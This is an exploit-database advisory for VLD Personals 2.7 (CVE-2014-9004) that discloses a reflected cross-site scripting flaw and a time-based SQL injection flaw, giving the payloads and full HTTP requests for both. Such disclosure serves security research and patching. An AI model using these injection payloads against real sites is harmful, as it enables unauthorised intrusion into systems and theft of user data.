# Exploit Title: VLD Personals – Multiple Vulnerabilities
# Date: 09/11/2014
# Exploit Author: Talib Osmani
# Exploit Authors Website: http://www.securitypentester.ninja
# Vendor Homepage: http://www.vldpersonals.com/
# Software Link: http://www.vldpersonals.com/clients/downloads.php
# Version: 2.7
# CVE: CVE-2014-9004
# Exploit-db: http://www.exploit-db.com/exploits/35193/
# Fixed Version 2.7.1
# Tested on: Windows / Linux

Cross Site Scripting
Issue detail:

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9314c”><script>alert(1)</script>a7ec313g818 was submitted in the id parameter. This input was echoed unmodified in the application’s response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application’s response.
Response :

GET /index.php?m=member_profile&p=profile&id=9314c”><script>alert(1)<%2fscript>a7ec313g818 HTTP/1.1

 

SQL Injection:

Issue detail:

The country/gender1/gender2 parameter appears to be vulnerable to SQL injection attacks. The payload and benchmark(20000000,sha1(1))– was submitted in the country parameter. The application took 11530 milliseconds to respond to the request, compared with 301 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
Response:

POST /index.php?m=search HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Cookie: visitors=x466x3878x3725x3797; PHPSESSID=nu75qtfsdsdod3hc1q4dgngfz232htg2s2; sessdata=0

age_from=19&age_to=19&issearch=1&submit=Search&gender1=2
&gender2=2&type_id=members
&country=
1%20and%20benchmark(20000000%2csha1(1))–%20